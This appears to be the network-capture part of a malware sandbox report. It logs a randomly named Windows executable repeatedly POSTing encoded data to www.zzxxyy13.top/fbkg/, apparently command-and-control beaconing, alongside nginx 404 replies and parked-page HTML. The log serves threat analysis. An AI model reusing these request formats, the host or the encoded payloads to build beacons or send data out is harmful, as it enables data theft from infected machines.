                                                                                                                                                                                                Nov 17, 2023 19:29:53.942508936 CET845INData Raw: 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 76 65 72 2e 63 6f 6d 2f 61 62 6f 75 74 3f 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 41 62 6f 75 74 20 55 73 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 3c 61 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77
                                                                                                                                                                                                Data Ascii: "https://www.hover.com/about?source=parked">About Us</a></li><li><a rel="nofollow" href="https://help.hover.com/home?source=parked">Help</a></li><li><a rel="nofollow" href="https://www.hover.com/tools?source=parked">Your Account</a></li></u
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942732096 CET846INData Raw: 33 35 39 20 30 2e 39 31 31 35 35 2c 38 2e 30 31 38 37 35 20 2d 32 39 2e 32 34 33 34 34 2c 2d 31 2e 34 36 37 32 33 20 2d 35 35 2e 31 36 39 39 35 2c 2d 31 35 2e 34 37 35 38 32 20 2d 37 32 2e 35 32 34 36 31 2c 2d 33 36 2e 37 36 33 39 36 20 2d 33 2e
                                                                                                                                                                                                Data Ascii: 359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.1
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942802906 CET848INData Raw: 4d 37 36 38 20 31 32 37 30 20 71 2d 37 20 30 20 2d 37 36 2e 35 20 30 2e 35 74 2d 31 30 35 2e 35 20 30 74 2d 39 36 2e 35 20 2d 33 74 2d 31 30 33 20 2d 31 30 74 2d 37 31 2e 35 20 2d 31 38 2e 35 71 2d 35 30 20 2d 32 30 20 2d 38 38 20 2d 35 38 74 2d
                                                                                                                                                                                                Data Ascii: M768 1270 q-7 0 -76.5 0.5t-105.5 0t-96.5 -3t-103 -10t-71.5 -18.5q-50 -20 -88 -58t-58 -88q-11 -29 -18.5 -71.5t-10 -103t-3 -96.5t0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.
                                                                                                                                                                                                Nov 17, 2023 19:29:53.942847967 CET848INData Raw: 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 20 20 0a 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27 55 41
                                                                                                                                                                                                Data Ascii: nt,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                35160.202.170.2180192.168.11.2050162C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:59.433222055 CET849OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.zzxxyy13.top
                                                                                                                                                                                                Referer: http://www.zzxxyy13.top/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 6a 31 6b 4b 48 4a 2f 79 6b 57 62 43 43 6c 66 70 50 33 62 7a 6e 30 37 31 54 44 71 6a 44 64 33 59 42 32 30 49 37 76 55 62 6c 55 77 54 34 71 2f 51 54 65 36 70 43 36 32 55 51 77 7a 31 6e 52 6f 79 4c 59 78 42 32 4d 45 78 38 67 46 68 4e 48 4c 50 6f 43 68 64 35 57 52 32 73 2b 73 7a 79 6c 32 4a 33 58 43 79 48 6b 6d 69 65 55 4e 74 43 4e 6b 4e 6e 42 74 71 71 58 75 4b 67 55 6e 62 6c 2f 74 43 5a 68 70 47 67 6d 43 38 54 63 48 7a 57 31 5a 44 43 55 62 70 53 42 4f 48 70 36 4b 68 58 4c 78 6a 68 32 2b 73 74 6e 39 67 6e 77 78 61 74 4b 50 4a 41 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=kj1kKHJ/ykWbCClfpP3bzn071TDqjDd3YB20I7vUblUwT4q/QTe6pC62UQwz1nRoyLYxB2MEx8gFhNHLPoChd5WR2s+szyl2J3XCyHkmieUNtCNkNnBtqqXuKgUnbl/tCZhpGgmC8TcHzW1ZDCUbpSBOHp6KhXLxjh2+stn9gnwxatKPJA==
                                                                                                                                                                                                Nov 17, 2023 19:30:00.128356934 CET850OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.zzxxyy13.top
                                                                                                                                                                                                Referer: http://www.zzxxyy13.top/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 6a 31 6b 4b 48 4a 2f 79 6b 57 62 43 43 6c 66 70 50 33 62 7a 6e 30 37 31 54 44 71 6a 44 64 33 59 42 32 30 49 37 76 55 62 6c 55 77 54 34 71 2f 51 54 65 36 70 43 36 32 55 51 77 7a 31 6e 52 6f 79 4c 59 78 42 32 4d 45 78 38 67 46 68 4e 48 4c 50 6f 43 68 64 35 57 52 32 73 2b 73 7a 79 6c 32 4a 33 58 43 79 48 6b 6d 69 65 55 4e 74 43 4e 6b 4e 6e 42 74 71 71 58 75 4b 67 55 6e 62 6c 2f 74 43 5a 68 70 47 67 6d 43 38 54 63 48 7a 57 31 5a 44 43 55 62 70 53 42 4f 48 70 36 4b 68 58 4c 78 6a 68 32 2b 73 74 6e 39 67 6e 77 78 61 74 4b 50 4a 41 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=kj1kKHJ/ykWbCClfpP3bzn071TDqjDd3YB20I7vUblUwT4q/QTe6pC62UQwz1nRoyLYxB2MEx8gFhNHLPoChd5WR2s+szyl2J3XCyHkmieUNtCNkNnBtqqXuKgUnbl/tCZhpGgmC8TcHzW1ZDCUbpSBOHp6KhXLxjh2+stn9gnwxatKPJA==
                                                                                                                                                                                                Nov 17, 2023 19:30:00.449803114 CET851INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:04 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:30:00.749825001 CET851INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:04 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                35192.168.11.2050162160.202.170.2180C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:29:59.433222055 CET849OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.zzxxyy13.top
                                                                                                                                                                                                Referer: http://www.zzxxyy13.top/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 6a 31 6b 4b 48 4a 2f 79 6b 57 62 43 43 6c 66 70 50 33 62 7a 6e 30 37 31 54 44 71 6a 44 64 33 59 42 32 30 49 37 76 55 62 6c 55 77 54 34 71 2f 51 54 65 36 70 43 36 32 55 51 77 7a 31 6e 52 6f 79 4c 59 78 42 32 4d 45 78 38 67 46 68 4e 48 4c 50 6f 43 68 64 35 57 52 32 73 2b 73 7a 79 6c 32 4a 33 58 43 79 48 6b 6d 69 65 55 4e 74 43 4e 6b 4e 6e 42 74 71 71 58 75 4b 67 55 6e 62 6c 2f 74 43 5a 68 70 47 67 6d 43 38 54 63 48 7a 57 31 5a 44 43 55 62 70 53 42 4f 48 70 36 4b 68 58 4c 78 6a 68 32 2b 73 74 6e 39 67 6e 77 78 61 74 4b 50 4a 41 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=kj1kKHJ/ykWbCClfpP3bzn071TDqjDd3YB20I7vUblUwT4q/QTe6pC62UQwz1nRoyLYxB2MEx8gFhNHLPoChd5WR2s+szyl2J3XCyHkmieUNtCNkNnBtqqXuKgUnbl/tCZhpGgmC8TcHzW1ZDCUbpSBOHp6KhXLxjh2+stn9gnwxatKPJA==
                                                                                                                                                                                                Nov 17, 2023 19:30:00.128356934 CET850OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 184
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.zzxxyy13.top
                                                                                                                                                                                                Referer: http://www.zzxxyy13.top/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 6a 31 6b 4b 48 4a 2f 79 6b 57 62 43 43 6c 66 70 50 33 62 7a 6e 30 37 31 54 44 71 6a 44 64 33 59 42 32 30 49 37 76 55 62 6c 55 77 54 34 71 2f 51 54 65 36 70 43 36 32 55 51 77 7a 31 6e 52 6f 79 4c 59 78 42 32 4d 45 78 38 67 46 68 4e 48 4c 50 6f 43 68 64 35 57 52 32 73 2b 73 7a 79 6c 32 4a 33 58 43 79 48 6b 6d 69 65 55 4e 74 43 4e 6b 4e 6e 42 74 71 71 58 75 4b 67 55 6e 62 6c 2f 74 43 5a 68 70 47 67 6d 43 38 54 63 48 7a 57 31 5a 44 43 55 62 70 53 42 4f 48 70 36 4b 68 58 4c 78 6a 68 32 2b 73 74 6e 39 67 6e 77 78 61 74 4b 50 4a 41 3d 3d
                                                                                                                                                                                                Data Ascii: T6I=kj1kKHJ/ykWbCClfpP3bzn071TDqjDd3YB20I7vUblUwT4q/QTe6pC62UQwz1nRoyLYxB2MEx8gFhNHLPoChd5WR2s+szyl2J3XCyHkmieUNtCNkNnBtqqXuKgUnbl/tCZhpGgmC8TcHzW1ZDCUbpSBOHp6KhXLxjh2+stn9gnwxatKPJA==
                                                                                                                                                                                                Nov 17, 2023 19:30:00.449803114 CET851INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:04 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:30:00.749825001 CET851INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:04 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                36160.202.170.2180192.168.11.2050163C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:02.279953957 CET853OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 524
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.zzxxyy13.top
                                                                                                                                                                                                Referer: http://www.zzxxyy13.top/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 6a 31 6b 4b 48 4a 2f 79 6b 57 62 44 6d 68 66 76 63 66 62 69 58 30 30 70 44 44 71 74 6a 64 7a 59 42 36 30 49 36 62 45 59 54 4d 77 54 5a 61 2f 65 79 65 36 71 43 36 32 62 77 77 36 6f 33 52 33 79 4c 56 52 42 33 67 45 78 38 30 46 67 34 54 4c 48 34 43 75 57 5a 57 65 78 73 2b 74 68 43 6c 34 4a 33 62 77 79 44 73 6d 6a 74 51 4e 71 42 6c 6b 4a 7a 56 69 37 61 57 45 4d 67 55 6d 56 46 2f 72 43 5a 74 68 47 69 6d 34 37 6c 55 48 7a 32 56 5a 43 43 55 59 77 53 41 47 49 4a 37 71 6f 56 61 6f 37 54 57 5a 2b 75 37 7a 6e 53 68 66 63 4e 62 58 52 51 4d 70 71 52 70 63 6c 42 69 33 73 4a 4b 58 2f 34 32 6b 64 35 75 78 43 46 45 54 48 39 77 64 42 4c 46 62 75 63 5a 2b 67 6f 43 68 73 43 62 4b 7a 55 44 66 44 51 2b 59 54 2f 55 77 4b 63 43 76 46 36 49 6b 45 41 64 73 64 65 63 56 6b 41 2f 37 56 38 35 48 4a 78 78 70 54 41 4e 34 7a 6e 46 33 6d 36 44 2f 76 6f 4d 31 66 48 62 6d 7a 4a 50 38 62 6b 52 5a 64 56 70 66 7a 53 66 5a 4b 4e 4b 5a 70 6f 61 30 5a 47 32 39 6c 49 41 6d 55 6b 6d 70 54 77 4d 61 38 52 61 65 6c 67 35 58 72 4f 70 2b 67 4b 50 37 2f 4f 4e 53 36 70 53 73 56 78 44 75 55 53 2f 55 32 74 46 69 79 47 70 41 73 79 63 43 53 56 58 58 73 37 67 70 4c 35 79 6d 70 70 46 64 31 74 4c 6e 7a 44 7a 34 75 6c 65 34 68 71 37 61 6d 6c 4e 49 33 6d 74 4a 48 52 70 47 78 59 7a 66 75 47 39 64 69 61 56 30 42 57 2f 2b 38 6b 57 36 78 2b 4a 35 43 76 4e 4a 30 57 79 78 6f 52 62 79 69 51 4b 2f 4c 46 45 34 61 51 65 52 6b 4e 42 6d 4c 70 6c 79 38 30 69 37 6e 56 2f 4d 53 4b 51 38 6c 53 54 7a 2f 4a 66 61 47 71 79 67 56 75 56 79 43 65 72 6a 66 59 77 57 42 74 37 39 62 47 41 6a 56 61 75 6c 62 62 4d 3d
